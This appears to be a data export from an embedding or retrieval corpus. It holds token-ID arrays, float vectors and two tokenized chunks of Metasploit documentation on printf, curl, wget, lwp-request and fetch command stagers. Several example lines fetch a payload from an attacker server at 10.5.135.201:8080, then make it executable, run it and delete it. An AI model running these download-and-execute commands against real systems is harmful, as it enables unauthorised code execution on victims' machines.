2074, 9052, 2015, 1996, 18093, 1010, 10381, 5302, 2094, 1998, 15389, 2009, 1012, 2019, 2742, 1997, 2008, 3504, 2714, 2000, 2023, 1024, 9052, 1011, 4372, 1032, 1032, 1060, 23632, 1032, 1032, 1060, 23632, 1032, 1032, 1060, 23632, 1032, 1032, 1060, 23632, 1028, 1028, 1013, 1056, 8737, 1013, 18093, 1025, 10381, 5302, 2094, 6255, 2581, 1013, 1056, 8737, 1013, 18093, 1025, 1013, 1056, 8737, 1013, 18093, 1025, 28549, 1011, 1042, 1013, 1056, 8737, 1013, 18093, 2000, 2224, 1996, 9052, 2754, 2099, 1010, 2593, 20648, 2115, 4642, 5104, 26702, 12881, 14973, 2953, 1999, 1996, 27425, 1024, 1005, 4642, 5104, 26702, 12881, 14973, 2953, 1005, 1027, 1028, 1031, 1005, 9052, 1005, 1033, 2030, 2275, 1996, 1024, 9052, 3145, 2000, 15389, 1035, 4642, 5104, 26702, 2099, 1024, 15389, 1035, 4642, 5104, 26702, 2099, 1006, 14894, 1024, 1024, 9052, 1007, 6140, 2546, 3094, 2754, 2099, 1011, 4800, 4132, 4179, 17848, 6263 ]
metasploit
107.txt
10
: 25the printf command stager is also suitable for multiple platforms except for windows. it just uses the printf command to write the payload to disk, chmod and execute it. an example of that looks similar to this : printf'\ 177 \ 177 \ 177 \ 177'> > / tmp / payload ; chmod + x / tmp / payload ; / tmp / payload ; rm - f / tmp / payload to use the printf stager, either specify your cmdstagerflavor in the metadata :'cmdstagerflavor'= > ['printf'] or set the : printf key to execute _ cmdstager : execute _ cmdstager ( flavor : : printf ) curl command stager - multi platformthe curl command stager uses the curl command on the target host to download the payload file. it requires users to specify a srvhost and srvport values and will start an http server to host the payload file. an example of that looks similar to this : curl - so / tmp / dtnglaal url : / / 10. 5. 135. 201 : 8080 / mdkwkcdgctu ; chmod + x / tmp / dtnglaal ; / tmp / dtnglaal ; rm - f / tmp / dtnglaal " to use the curl stager, either specify your cmdstagerflavor in the metadata :'cmdstagerflavor'= > ['curl'] or set the : curl key to execute _ cmdstager : execute _ cmdstager ( flavor : : curl ) wget command stager - multi platformthe wget command stager is similar to the curl command stager, except instead of using curl to download the file on the target host, it uses the wget command. it requires users to specify a srvhost and srvport values and will start an http server to host the payload file. an example of that looks similar to this : wget - qo / tmp / mzxxujch url : / / 10. 5. 135. 201 : 8080 / mdkwkcdgctu ; chmod + x / tmp / mzxxujch ; / tmp / mzxxujch ; rm - f / tmp / mzxxujch to use the wget stager,
[ 0.04521302506327629, -0.5539700388908386, -0.034135352820158005, 0.9765674471855164, -0.4608938992023468, -0.2960682213306427, -0.11389921605587006, 0.5853556990623474, 0.1779460906982422, 0.42153236269950867, -0.33719831705093384, 0.06183488294482231, 0.2372981458902359, -0.9914596080780029, -0.04063203185796738, -0.5533985495567322, -1.0267858505249023, -0.3510076105594635, -1.2124000787734985, -0.3552202880382538, -0.27893078327178955, 0.32808151841163635, -0.4926529824733734, -0.9265530109405518, -0.12842051684856415, 0.5452221035957336, 0.1852276772260666, 0.0789557471871376, 0.3417322635650635, 0.6565314531326294, 0.2921859323978424, -0.3129885494709015, 0.17711424827575684, -0.5455064177513123, 0.7122799158096313, 0.20090655982494354, 0.6420994997024536, -0.48183318972587585, 0.21501317620277405, -0.5268696546554565, 0.8510420322418213, -0.29221585392951965, 0.06510204076766968, -0.5712949633598328, -0.5427075624465942, -0.34542909264564514, 0.5407658219337463, -0.47024500370025635, 0.28282493352890015, -0.44401901960372925, -0.03741325065493584, -0.11026449501514435, -0.5338227152824402, 0.362336128950119, -0.20491330325603485, -0.2854984700679779, -0.06322349607944489, -0.02833406813442707, -0.1346653550863266, 0.7423031330108643, -0.05957147479057312, -0.022204624488949776, 0.06977257877588272, -0.6841708421707153, -0.6349896788597107, 0.13205665349960327, -0.21702368557453156, -0.6986905336380005, 0.021251410245895386, -0.18315939605236053, -0.17610646784305573, 0.9032188653945923, -0.06320776045322418, -0.49284371733665466, -0.40588080883026123, -0.06685972213745117, -0.09828606247901917, -0.20462948083877563, -0.5161782503128052, 0.5836479067802429, -0.036259911954402924, 0.07990629971027374, 0.35923975706100464, -0.40198543667793274, 0.09459307044744492, -0.8539639115333557, 0.6737656593322754, 0.5368430018424988, -0.20364291965961456, 0.17750011384487152, 0.4494018852710724, 0.4152287542819977, -0.4372372329235077, -0.3710331320762634, 0.14075936377048492, 0.2273024469614029, -0.2864924371242523, -0.17518456280231476, 0.3520341217517853, -0.5307199954986572, 1.157379150390625, 0.5505596995353699, 0.44840100407600403, 0.3692013919353485, -0.07073306292295456, 0.3496830463409424, 0.26401638984680176, -0.2549392282962799, -0.8578577041625977, -0.8957608938217163, 0.7321521639823914, -0.019629165530204773, 0.109665647149086, -0.7443826794624329, -0.10100027173757553, 0.527985692024231, 0.49534669518470764, 0.053503114730119705, -0.8916479349136353, 0.6165194511413574, -0.07707267999649048, -0.31026649475097656, 0.47144991159439087, -0.5735308527946472, 0.23421591520309448, -0.03806173428893089, 0.48033633828163147, 0.6417792439460754, -1.018298864364624, -0.7722920179367065, 0.10985322296619415, -0.6279621124267578, -0.29066646099090576, 0.7899099588394165, -0.1272442638874054, 1.1634877920150757, -0.10141810774803162, 0.0393245629966259, 1.1984937191009521, -0.6033732295036316, -0.09834889322519302, 0.10035378485918045, 0.3885413706302643, 1.478827953338623, -0.13185840845108032, 0.21550138294696808, -0.29037362337112427, 0.3091355562210083, -0.18140281736850739, 0.7305983304977417, -0.3425378203392029, 0.5487828850746155, 0.4879847466945648, -0.24596858024597168, -0.5562843680381775, 0.47507214546203613, -0.5739607214927673, 0.22291205823421478, -0.11421950161457062, -0.10378576070070267, -0.11259238421916962, 0.45991525053977966, 0.1001415103673935, 0.1819438487291336, -0.3273405432701111, 0.6618353724479675, -1.1207399368286133, -0.33347344398498535, -0.4362855851650238, -0.0928679034113884, 0.44647544622421265, 0.21923291683197021, -0.344796359539032, 0.13801470398902893, 1.7399767637252808, 1.0949122905731201, -0.047861602157354355, -0.15436311066150665, 0.4454399645328522, 0.35778680443763733, -1.0875589847564697, 0.9573001861572266, 0.24473446607589722, 1.0261449813842773, -0.30898264050483704, 0.44379323720932007, 0.1981431394815445, -0.10859328508377075, -0.09138214588165283, 0.23691141605377197, -0.11098629981279373, 0.5923752188682556, -0.7389883995056152, 0.3272705376148224, 0.4687126874923706, 0.3232417106628418, -0.8199809193611145, 0.11407772451639175, -0.2677646279335022, -1.4679158926010132, -0.47661352157592773, 0.21467246115207672, 0.14214065670967102, 0.20116882026195526, -0.38506725430488586, -0.6456944346427917, 0.9334825873374939, 0.554240345954895, -0.5303236246109009, 0.7105544209480286, 0.9766456484794617, 0.04895985499024391, -0.4816107749938965, -0.26221761107444763, -0.19928140938282013, 0.42842864990234375, -0.6576342582702637, 0.31313616037368774, -0.16563431918621063, 0.4580822288990021, 0.07623622566461563, 0.3906445801258087, 0.9603207111358643, 0.6136063933372498, -0.11075002700090408, -0.6644328832626343, 0.07912193238735199, 0.3383658528327942, -0.3749845325946808, -0.14701956510543823, -0.5148757696151733, 0.5461919903755188, 0.37362706661224365, 0.6668812036514282, 0.824358344078064, -0.28588488698005676, 0.3810836374759674, -0.045535676181316376, -0.15580688416957855, 0.14526896178722382, 0.0727822557091713, 0.7398934364318848, 0.30189698934555054, 0.6354896426200867, 0.012318110093474388, 0.25135916471481323, -0.43418756127357483, -0.3938339054584503, 0.15603551268577576, 0.5428218841552734, 0.11041876673698425, 0.7262439131736755, 0.28754374384880066, -0.33088603615760803, -0.8640944361686707, -0.6968674063682556, 0.7487006783485413, 0.47728750109672546, -0.6012707948684692, -0.9968762397766113, -0.28501686453819275, 0.5251272916793823, 0.14662928879261017, -0.07665097713470459, 0.23757219314575195, 0.6899256110191345, -0.25460535287857056, 0.45255720615386963, 0.0076459781266748905, -0.6136795282363892, -0.2787945866584778, -0.6105195879936218, -0.7225025296211243, -0.9301766753196716, -0.41058430075645447, 0.0033254718873649836, 0.37176743149757385, -0.4658306837081909, 0.4455394446849823, -0.1755204200744629, -0.658037006855011, 0.13254573941230774, 0.15874585509300232, 0.5306404232978821, -0.07119573652744293, 0.07760872691869736, -0.406411737203598, 0.3376213610172272, -0.021913062781095505, 0.9926896691322327, -0.27500882744789124, -0.16879230737686157, 0.04691455885767937, -0.4159809947013855, -0.42343518137931824, -0.42461973428726196, 0.4952486753463745, 0.4984583258628845, 0.34522756934165955, -0.4158974885940552, -0.17424629628658295, 0.020576296374201775, 0.4267105758190155, 0.9583716988563538, -0.6502500176429749, 0.8194437026977539, 0.15187351405620575, -0.13461625576019287, 0.5319684743881226, 1.1264173984527588, -0.6475093960762024, 0.4926373064517975, -0.008956249803304672, 0.28770700097084045, -0.8185014724731445, 0.8302401304244995, -0.06148838624358177, -0.0920361876487732, -0.11843625456094742, -0.14845658838748932, 0.04359917342662811, -0.425743967294693, -0.3874632716178894, -0.38031721115112305, -0.3685574531555176, 0.9335645437240601, -0.32492950558662415, -0.5807151198387146, 0.21247665584087372, -0.45724111795425415, 0.11705733090639114, 0.08483126014471054, -0.5726151466369629, 0.5018521547317505, 0.06455310434103012, 0.05134647712111473, -0.0965430736541748, -0.3013462722301483, 0.023460466414690018, -0.06804385036230087, -0.1240210086107254, -0.7437762022018433, 0.25916120409965515, 0.3183838725090027, 0.05371918901801109, 0.5364168286323547, 0.5638923048973083, -0.7997198104858398, 0.029445426538586617, -0.34646543860435486, -0.616830587387085, -0.09870677441358566, 0.15092377364635468, 0.4102540910243988, 0.09125252068042755, 1.0561407804489136, -1.0005033016204834, -0.8770989775657654, 0.09228289127349854, 0.2310621291399002, 0.0006654274184256792, -0.47247880697250366, -0.01699049025774002, -0.3136318325996399, -0.49426835775375366, -0.528778612613678, 0.35447219014167786, 0.19183167815208435, 0.6715555191040039, -0.3044002652168274, 0.3819293677806854, 0.2627207934856415, -0.24323394894599915, 0.46110010147094727, -0.9789517521858215, -0.5388559103012085, 0.8461519479751587, 0.1895942986011505, 0.5137159824371338, -0.47596749663352966, 0.1419895738363266, -0.3399900496006012, 0.09917040914297104, 0.18622635304927826, 0.40352755784988403, -0.30900004506111145, -0.13158820569515228, -0.6150737404823303, 0.21481917798519135, -0.37500786781311035, 0.5165199041366577, -0.10018707066774368, 0.2546400725841522, -0.5416574478149414, -0.8601067662239075, -0.07808014750480652, 0.5534892678260803, 0.9236946702003479, 0.525089681148529, 0.4086468517780304, 0.3665717542171478, 0.4808085560798645, -0.5961065888404846, 0.5759872198104858, -0.2926914393901825, 0.5437163710594177, 0.23933324217796326, 0.31504514813423157, -0.5485280752182007, 0.724168062210083, -0.07865307480096817, -0.2809693515300751, -0.7187592387199402, 0.32400748133659363, 0.22690139710903168, 0.11667851358652115, -0.9018639326095581, 0.09876459091901779, -0.10319390147924423, 0.016834411770105362, -0.16629363596439362, -0.12272337824106216, -0.25120407342910767, 1.2087620496749878, 0.6118582487106323, -0.703143835067749, -0.6303253769874573, -0.34021010994911194, 0.43300214409828186, 0.29567110538482666, 0.30651214718818665, -0.5201655626296997, -0.8604099750518799, -0.7228561639785767, -0.5758635401725769, 0.5554633736610413, 0.35213881731033325, 0.48782047629356384, -0.2430606484413147, -0.9911169409751892, -0.3966018259525299, 0.6249293684959412, -0.23401594161987305, -0.4771668612957001, -0.4491179883480072, 0.47785288095474243, 0.36166274547576904, 0.3560371398925781, -0.8783168196678162, -0.653224527835846, -0.2021128088235855, -1.2638280391693115, 0.13145527243614197, -0.3794684410095215, 0.2200203537940979, 0.5648263096809387, -0.5254585146903992, 0.28223279118537903, -0.22537323832511902, -0.01576566882431507, -0.30043211579322815, 0.28485390543937683, 0.2221987545490265, 0.07524678856134415, -0.21434926986694336, 0.9095736145973206, -0.016936786472797394, 0.3055100440979004, 0.5659427642822266, 0.08802682906389236, 0.18451446294784546, -0.008543336763978004, -0.40252000093460083, -0.42340418696403503, 0.016227083280682564, -0.7335519790649414, 0.2913413345813751, -0.25654783844947815, 0.2964683175086975, -0.23678261041641235, -0.33899256587028503, 0.653173565864563, 0.45979559421539307, 0.2126009166240692, -0.8233701586723328, -0.7853176593780518, 0.406334787607193, 0.034457940608263016, 0.4167431890964508, -0.365085244178772, -0.1736537665128708, -0.14727264642715454, 0.07306761294603348, -0.44194725155830383, -0.6947885155677795, -0.5976527333259583, -0.09643144905567169, -0.4778815805912018, 0.2474275529384613, 0.16606059670448303, 0.30766376852989197, -0.43627405166625977, -0.23102737963199615, 0.3803184926509857, -0.2700059115886688, 0.18305286765098572, -0.2913258969783783, 0.13516762852668762, -0.09121830761432648, -0.31652575731277466, 0.23425815999507904, 0.48080000281333923, -0.2196483612060547, -0.09051823616027832, 0.09222421050071716, 1.195127010345459, 0.15198633074760437, -0.11738941818475723, -0.7235130667686462, 0.4997365474700928, -0.14372999966144562, -0.24050287902355194, -0.044733595103025436, 0.8270840048789978, -0.4540833830833435, 0.3650095760822296, -0.4826459586620331, -0.5626376867294312, -1.0162851810455322, -0.79291832447052, 0.2526082992553711, -0.2790481150150299, 0.1464088261127472, -0.6900498867034912, -0.9105467796325684, -0.38414573669433594, 0.08314867317676544, 0.2218255251646042, -1.0422794818878174, -0.12507563829421997, -0.16156025230884552, 0.3989027440547943, 0.15570835769176483, -0.07436560839414597, -0.17724430561065674, -0.6623289585113525, -0.18028491735458374, 0.3933274745941162, -0.11315590888261795, 0.03392963856458664, -0.4684966504573822, 0.5598359107971191, 1.0136799812316895, -0.2590876519680023, -0.9871803522109985, -0.309210866689682, -0.587073802947998, -0.0757015123963356, -0.30508098006248474, -0.09354566037654877, -0.6966708898544312, 0.7704784274101257, -0.43567800521850586, -0.10234617441892624, 0.11134514957666397, -0.25575804710388184, -0.21552924811840057, 0.490802139043808, 0.6038076877593994, -0.42390087246894836, 0.25568893551826477, -0.21550779044628143, 0.4910118281841278, 0.704584002494812, 0.07527703791856766, -0.9370301365852356, -0.012036602012813091, -0.5557026863098145, -1.2146910429000854, 0.731436014175415, -0.1492224633693695, -0.5395787358283997, 0.3477005362510681, 0.15693522989749908, 0.8499329090118408, -0.4742690324783325, 0.5082336664199829, 1.114613652229309, 0.39765021204948425, 0.29515376687049866, -0.5621678233146667, 0.664170503616333, 0.6737987995147705, -0.5587570071220398, -0.06515923142433167, -0.3581410050392151, 0.06439848244190216, 0.010044672526419163, -0.26022443175315857, -0.481070876121521, -0.4079316258430481, -0.3968347907066345, 0.8115207552909851, -0.37419214844703674, 0.8288907408714294, -0.36234456300735474, -0.6590021252632141, -0.5493057370185852, 0.1967717707157135, 0.13644175231456757, 0.07069714367389679, 0.25016388297080994, 0.1789230853319168, 0.993915319442749, 0.30464527010917664, -0.12101881951093674, -0.2780355215072632, -0.003394927131012082, 0.567278265953064, 0.23904965817928314, -0.6915655732154846, 1.2367454767227173, 0.05893159285187721, -0.8574613332748413, -0.7484757304191589, -0.6308969259262085, -0.5196681618690491, -0.205430269241333, -0.24527472257614136, -0.7370160222053528, 0.02349044941365719, 0.025284461677074432, -0.12154361605644226, 0.8402318358421326, -0.13428877294063568, 0.14861075580120087, -0.38874343037605286, 0.09069401025772095, -0.09334789216518402, 0.11569833755493164, 0.6919506192207336, -0.6390429735183716, -0.5930116772651672, -0.9292120337486267, -0.258981317281723, 0.24418367445468903, 0.3266045153141022, 0.4549891948699951, 0.47700104117393494, 0.8468201756477356, -0.0493219830095768, 0.09789390861988068, 0.9240691065788269, -0.42868390679359436, 0.7455707788467407, 0.5952663421630859, -0.4475037157535553, -0.8118278980255127, -0.40336230397224426, 0.2545199692249298, 0.7905819416046143, 0.4835197627544403, -0.154086172580719, -0.629019558429718, 0.03639509528875351, 0.1975233554840088, -0.6674466729164124, -0.9009577631950378, -0.49429064989089966, -0.6463123559951782, -0.3392735421657562, 0.39052775502204895, -0.3663492500782013, 0.14547514915466309, -0.08956165611743927, -0.27388468384742737, -0.2134648710489273, -1.0913113355636597, 0.6679338216781616, -0.37015867233276367, 0.2615789473056793, 0.14062131941318512, 0.1644962579011917, -0.2563210129737854, -0.37199392914772034, -0.32337331771850586, -0.10067139565944672, -0.3137543797492981, -0.31199049949645996, -0.37073302268981934, 0.01394068356603384, -0.8080791234970093, 0.46832555532455444, -0.5130178332328796, -0.42764243483543396, 0.3062869608402252, -1.177520513534546, 0.3819311857223511, 1.1551226377487183, -0.0321597196161747, 0.49994999170303345, 0.496147483587265, -0.015027842484414577, 0.4575739800930023, -0.41514062881469727, -0.12494682520627975, -0.07436542958021164, 0.5717628598213196, 0.5100893974304199, 0.11021608859300613, -0.44642847776412964, -0.25185534358024597, 0.4752472937107086, -0.5698408484458923, -0.06867624819278717, -0.6917752027511597, 0.3581240773200989, -0.09237466007471085, 0.248872771859169, 0.08263755589723587, 0.6684312224388123, -0.001927619450725615, 0.9832059144973755, -0.641627848148346, 0.7628061175346375, 0.21587690711021423, -0.3089446425437927, 0.28202831745147705, -0.10505817830562592, 0.29449203610420227, -0.24965794384479523, -0.22530607879161835, 0.07891988754272461, 0.3737811744213104, 0.36542510986328125, 0.08679439127445221, -0.1477099508047104, -0.24632997810840607, -0.1295815408229828, 0.2652115523815155, 0.8891821503639221, -0.3855329155921936, 0.10387197136878967, 0.8798443078994751, -0.11609318107366562, -0.46924495697021484, 0.09939946979284286, -1.1674467325210571, -0.5515773296356201, 0.08878310769796371, -0.010315916500985622, -0.4685315787792206, -0.2349335253238678, -0.17824706435203552, -0.6208786368370056, 0.15743865072727203, 0.035305675119161606, 0.951390266418457, 0.18255017697811127, -0.009523643180727959, 1.3369364738464355, -0.11903006583452225, -0.29175662994384766, -0.06082546338438988, 0.27005574107170105, -0.6836388111114502, -1.3054190874099731, 0.1916733980178833, 0.9356218576431274, 0.561039924621582, 0.1150813177227974, -0.17890582978725433, -0.00700821029022336, -0.01730811595916748, -0.0847439095377922, 0.0042367177084088326, 0.11539898812770844, -0.3912370204925537, 0.5313993096351624, 0.04517573490738869, 0.21768824756145477, -0.06957315653562546, 0.5087937116622925, 0.8305935859680176, -0.08204786479473114, -0.25491636991500854, 0.541104257106781, 0.5519605278968811, 0.1363813877105713, 0.24853308498859406, 0.8402112722396851, 0.12869203090667725, -0.9224066138267517, 0.22235766053199768, -0.5388503670692444, -0.27892938256263733, -0.36928510665893555, -0.1486705243587494, 0.1553763449192047, 0.731864869594574, 0.5581077933311462, -0.9187113046646118, -0.47756797075271606, 0.8007544875144958, -0.011060609482228756, -0.34916868805885315, 0.16975410282611847, -0.4434193968772888, 0.21575333178043365, -0.22469286620616913, -0.41616153717041016, 0.7311084270477295, 0.09739688783884048, -0.22011825442314148, -0.18938663601875305, -0.09047272056341171, 0.9906792044639587, -0.18555983901023865, 0.1118241548538208, 0.07129086554050446, -0.10218705236911774, -0.004871611949056387, 0.3563220798969269, -0.5160230398178101, 0.4783306121826172, 0.497712641954422, 0.5675104856491089, 0.18690833449363708, 0.8179367780685425, -0.19350163638591766, 0.735910177230835, 0.03022867627441883, -0.10471857339143753, -0.4254247844219208, 0.23207299411296844, 0.2041301280260086, -0.27638980746269226, -0.24997907876968384, 0.47405189275741577, 0.50330650806427, -0.16583804786205292, 0.42451417446136475, -0.04449060186743736, -0.19412420690059662, -1.1977663040161133, 0.2533928453922272, -0.5491600036621094, 0.17926235496997833, 0.18703985214233398, -0.12518619000911713, -0.3410647213459015, 1.373383641242981, -0.18009039759635925, 0.6355129480361938, -0.48632171750068665, 0.8108152151107788, -0.095751091837883, 0.45861804485321045, -0.148990660905838, -0.2589573264122009, -0.7316831946372986, 0.36913612484931946, -0.10792744904756546, -0.655902624130249, 0.151181161403656, -0.0037720268592238426, 0.7705065608024597, -0.502515971660614, 0.1404082030057907, -0.7631874084472656, 0.1471477895975113, -0.3054848909378052, -1.1102850437164307, -0.27599382400512695, 0.25648412108421326, -0.24887676537036896, 0.08859231323003769, 0.3304081857204437, -0.10215403139591217, 0.20383088290691376, -0.05642508342862129, -0.5768008828163147, -0.4850466251373291, -0.505005955696106, 0.04240662604570389, 0.9501276016235352, -0.15593475103378296, -0.23581962287425995, 0.2614680826663971, -0.4592672288417816, -0.36088642477989197, 0.12041928619146347, -0.48510366678237915, -0.36005109548568726, 0.5944194793701172, 0.6536117792129517, 0.8416225910186768, -0.04412520304322243, -0.2173522412776947, -0.15356287360191345, 0.22658096253871918, 0.439177930355072, 0.047897182404994965, 0.2499367743730545, 0.3556440770626068, -0.028348291292786598, -0.10663361102342606, -0.40815016627311707, 0.9534720182418823, -0.07993678003549576, -0.36657577753067017, -0.0315256267786026, 0.15438073873519897, -0.9148524403572083, -0.12987785041332245, -0.07515106350183487, 0.3690570592880249, 0.5451070070266724, -0.015093632973730564, -0.9291673302650452, 0.08198320120573044, -0.3624763786792755, -0.22916164994239807, -0.3242865800857544, -0.4595305323600769, -0.07253311574459076, -0.2939302325248718, 0.23246949911117554, -1.0045204162597656, 4.3174262046813965, 0.2654208540916443, 0.09712430089712143, 0.578909695148468, -0.13952289521694183, 0.6813949942588806, 1.0881348848342896, -0.6550096869468689, 0.18996940553188324, -0.2664673626422882, -0.006983139552175999, -0.6791767477989197, -0.2651210427284241, 0.7149567008018494, 0.4437862038612366, 0.37546247243881226, -0.8759226202964783, -0.06263363361358643, 0.055461641401052475, -0.6475142240524292, -0.8037592172622681, -0.36801454424858093, 0.08709532767534256, 0.8002161979675293, -0.22860531508922577, 0.1324656456708908, 0.4441540837287903, -0.22816066443920135, 0.4233424663543701, -0.2596522867679596, -0.3822735846042633, -0.568893313407898, 0.29790198802948, 0.31030139327049255, -0.27055123448371887, 0.04779069870710373, -0.00023499142844229937, -1.0081229209899902, -0.12742739915847778, -0.7000156044960022, 0.46817368268966675, 0.22049710154533386, 0.1457216590642929, -0.5183212757110596, 0.06947310268878937, 0.44563642144203186, -1.2730313539505005, 0.2824079096317291, 0.6473662257194519, -0.9204548597335815, 1.0470845699310303, -0.20817311108112335, 0.393566370010376, 0.29904428124427795, -1.3041573762893677, -0.1849173754453659, 0.5215814113616943, 0.27448830008506775, 0.2289450764656067, 0.2476339489221573, 1.127725601196289, -0.5987313389778137, 0.4340885877609253, -0.2800552248954773, -0.9846110939979553, 0.4756963551044464, -0.31875696778297424, 0.48334571719169617, -0.03980173543095589, -0.1526918262243271, -0.24141383171081543, -0.19597822427749634, -0.13590918481349945, -0.4375118017196655, 0.7637602686882019, -0.11283357441425323, 0.28938028216362, 0.09599609673023224, 0.3222782611846924, -0.5752595663070679, 0.08163182437419891, -0.787493109703064, -1.2665096521377563, 0.3414829969406128, 0.932614266872406, 0.7908121347427368, -0.5011202096939087, -1.161075234413147, 0.16913889348506927, 0.25819405913352966, 0.716720700263977, 0.5933817625045776, -0.4902224540710449, 0.5366756916046143, 0.05170316621661186 ]
[ 1024, 10965, 2063, 6140, 2546, 3094, 2754, 2099, 2003, 2036, 7218, 2005, 3674, 7248, 3272, 2005, 3645, 1012, 2009, 2074, 3594, 1996, 6140, 2546, 3094, 2000, 4339, 1996, 18093, 2000, 9785, 1010, 10381, 5302, 2094, 1998, 15389, 2009, 1012, 2019, 2742, 1997, 2008, 3504, 2714, 2000, 2023, 1024, 6140, 2546, 1005, 1032, 18118, 1032, 18118, 1032, 18118, 1032, 18118, 1005, 1028, 1028, 1013, 1056, 8737, 1013, 18093, 1025, 10381, 5302, 2094, 1009, 1060, 1013, 1056, 8737, 1013, 18093, 1025, 1013, 1056, 8737, 1013, 18093, 1025, 28549, 1011, 1042, 1013, 1056, 8737, 1013, 18093, 2000, 2224, 1996, 6140, 2546, 2754, 2099, 1010, 2593, 20648, 2115, 4642, 5104, 26702, 12881, 14973, 2953, 1999, 1996, 27425, 1024, 1005, 4642, 5104, 26702, 12881, 14973, 2953, 1005, 1027, 1028, 1031, 1005, 6140, 2546, 1005, 1033, 2030, 2275, 1996, 1024, 6140, 2546, 3145, 2000, 15389, 1035, 4642, 5104, 26702, 2099, 1024, 15389, 1035, 4642, 5104, 26702, 2099, 1006, 14894, 1024, 1024, 6140, 2546, 1007, 15390, 3094, 2754, 2099, 1011, 4800, 4132, 10760, 15390, 3094, 2754, 2099, 3594, 1996, 15390, 3094, 2006, 1996, 4539, 3677, 2000, 8816, 1996, 18093, 5371, 1012, 2009, 5942, 5198, 2000, 20648, 1037, 5034, 2615, 15006, 2102, 1998, 5034, 2615, 6442, 5300, 1998, 2097, 2707, 2019, 8299, 8241, 2000, 3677, 1996, 18093, 5371, 1012, 2019, 2742, 1997, 2008, 3504, 2714, 2000, 2023, 1024, 15390, 1011, 2061, 1013, 1056, 8737, 1013, 26718, 3070, 2721, 2389, 24471, 2140, 1024, 1013, 1013, 2184, 1012, 1019, 1012, 11502, 1012, 16345, 1024, 3770, 17914, 1013, 9108, 2243, 26291, 19797, 18195, 8525, 1025, 10381, 5302, 2094, 1009, 1060, 1013, 1056, 8737, 1013, 26718, 3070, 2721, 2389, 1025, 1013, 1056, 8737, 1013, 26718, 3070, 2721, 2389, 1025, 28549, 1011, 1042, 1013, 1056, 8737, 1013, 26718, 3070, 2721, 2389, 1000, 2000, 2224, 1996, 15390, 2754, 2099, 1010, 2593, 20648, 2115, 4642, 5104, 26702, 12881, 14973, 2953, 1999, 1996, 27425, 1024, 1005, 4642, 5104, 26702, 12881, 14973, 2953, 1005, 1027, 1028, 1031, 1005, 15390, 1005, 1033, 2030, 2275, 1996, 1024, 15390, 3145, 2000, 15389, 1035, 4642, 5104, 26702, 2099, 1024, 15389, 1035, 4642, 5104, 26702, 2099, 1006, 14894, 1024, 1024, 15390, 1007, 1059, 18150, 3094, 2754, 2099, 1011, 4800, 4132, 10760, 1059, 18150, 3094, 2754, 2099, 2003, 2714, 2000, 1996, 15390, 3094, 2754, 2099, 1010, 3272, 2612, 1997, 2478, 15390, 2000, 8816, 1996, 5371, 2006, 1996, 4539, 3677, 1010, 2009, 3594, 1996, 1059, 18150, 3094, 1012, 2009, 5942, 5198, 2000, 20648, 1037, 5034, 2615, 15006, 2102, 1998, 5034, 2615, 6442, 5300, 1998, 2097, 2707, 2019, 8299, 8241, 2000, 3677, 1996, 18093, 5371, 1012, 2019, 2742, 1997, 2008, 3504, 2714, 2000, 2023, 1024, 1059, 18150, 1011, 1053, 2080, 1013, 1056, 8737, 1013, 1049, 2480, 20348, 23049, 2818, 24471, 2140, 1024, 1013, 1013, 2184, 1012, 1019, 1012, 11502, 1012, 16345, 1024, 3770, 17914, 1013, 9108, 2243, 26291, 19797, 18195, 8525, 1025, 10381, 5302, 2094, 1009, 1060, 1013, 1056, 8737, 1013, 1049, 2480, 20348, 23049, 2818, 1025, 1013, 1056, 8737, 1013, 1049, 2480, 20348, 23049, 2818, 1025, 28549, 1011, 1042, 1013, 1056, 8737, 1013, 1049, 2480, 20348, 23049, 2818, 2000, 2224, 1996, 1059, 18150, 2754, 2099, 1010 ]
metasploit
107.txt
11
either specify your cmdstagerflavor in the metadata :'cmdstagerflavor'= > ['wget'] or set the : wget key to execute _ cmdstager : execute _ cmdstager ( flavor : : wget ) lwp request command stager - multi platformthe lwp - request command stager is similar to the curl command stager, except instead of using curl to download the file on the target host, it uses the lwp - request command. it requires users to specify a srvhost and srvport values and will start an http server to host the payload file. an example of that looks similar to this : lwp - request - m get url : / / 10. 5. 135. 201 : 8080 / mdkwkcdgctu > / tmp / okondywn ; chmod + x / tmp / okondywn ; / tmp / okondywn ; rm - f / tmp / okondywn to use the lwprequest stager, either specify your cmdstagerflavor in the metadata :'cmdstagerflavor'= > ['lwprequest'] or set the : lwprequest key to execute _ cmdstager : execute _ cmdstager ( flavor : : lwprequest ) fetch command stager - bsd onlythe fetch command stager is similar to the curl command stager, except instead of using curl to download the file on the target host, it uses the fetch command. it requires users to specify a srvhost and srvport values and will start an http server to host the payload file. an example of that looks similar to this : fetch - qo / tmp / ugwuppcy url : / / 10. 5. 135. 201 : 8080 / mdkwkcdgctu ; chmod + x / tmp / ugwuppcy ; / tmp / ugwuppcy ; rm - f / tmp / ugwuppcy to use the fetch stager, either specify your cmdstagerflavor in the metadata :'cmdstagerflavor'= > ['fetch'] or set the : fetch key to execute _ cmdstager : execute _ cmdstager ( flavor : : fetch ) [SEP]
[ 0.2012857347726822, -0.020855028182268143, 0.06930957734584808, 0.7844612002372742, -0.46057388186454773, 0.039423514157533646, -0.2627573609352112, 0.4981992840766907, 0.23620650172233582, 0.8804683685302734, -0.37665891647338867, -0.37589356303215027, 0.7937995791435242, -0.4808056354522705, 0.27678966522216797, 0.0501471683382988, -0.19155475497245789, -0.7842893600463867, -0.5675211548805237, -0.2690869867801666, -0.27210837602615356, -0.22708459198474884, -0.537842869758606, -0.19306200742721558, 0.3357594311237335, 0.3577771782875061, -0.2977307438850403, -0.3234359323978424, 0.921833336353302, 0.32792237401008606, -0.13772791624069214, -0.495841383934021, 0.04697084799408913, -0.29387611150741577, 0.6548953056335449, -0.1233774870634079, -0.20950761437416077, -0.6337001919746399, -0.47290608286857605, -1.040243148803711, 0.43005168437957764, 0.1250978261232376, -0.06982024013996124, -0.5374582409858704, -0.3147209882736206, -0.22543764114379883, -0.10157663375139236, -0.2547203600406647, 0.5164446830749512, -0.403635710477829, -0.5877679586410522, 0.40626147389411926, -0.36296066641807556, -0.16642795503139496, -0.23885267972946167, -0.29198676347732544, -0.26648128032684326, -0.2648635506629944, 0.004849944729357958, 0.3219327926635742, -0.28923749923706055, 0.004853997845202684, -0.5970487594604492, -0.2806069850921631, -0.297245591878891, 0.16343587636947632, -0.3769659101963043, -0.2221664935350418, -0.017684442922472954, -0.7111921310424805, -0.6379952430725098, 1.0323548316955566, -0.32885533571243286, -1.4275600910186768, -0.1506686806678772, 0.6860778331756592, 0.07321206480264664, 0.2446996122598648, -0.03153015300631523, 1.478753685951233, 0.08249735832214355, 0.6170423626899719, 0.40748271346092224, 